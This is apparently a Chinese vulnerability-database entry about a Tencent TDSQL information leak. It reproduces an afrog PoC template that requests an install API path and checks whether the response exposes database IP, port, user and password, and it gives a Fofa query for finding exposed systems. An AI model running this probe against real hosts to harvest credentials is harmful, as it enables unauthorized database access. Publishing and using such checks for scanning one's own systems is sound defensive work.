tencent-tdsql-leak: 腾讯 TDSQL 数据库信息泄露

日期: 2025-09-01 | 影响软件: 腾讯TDSQL | POC: 已公开

漏洞描述

Fofa: app="TDSQL"

PoC代码[已公开]

id: tencent-tdsql-leak

info:
  name: 腾讯 TDSQL 数据库信息泄露
  author: zan8in
  severity: high
  verified: false
  description: |-
    Fofa: app="TDSQL"
  tags: tencent,tdsql,leak,disclosure
  created: 2024/01/07

rules:
  r0:
    request:
      method: GET
      path: /tdsqlpcloud/index.php/api/install/get_db_info
    expression: response.status == 200 &&
      response.body.bcontains(b'ip') &&
      response.body.bcontains(b'port') &&
      response.body.bcontains(b'user') &&
      response.body.bcontains(b'pwd')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/tencent-tdsql-leak.yaml

相关漏洞推荐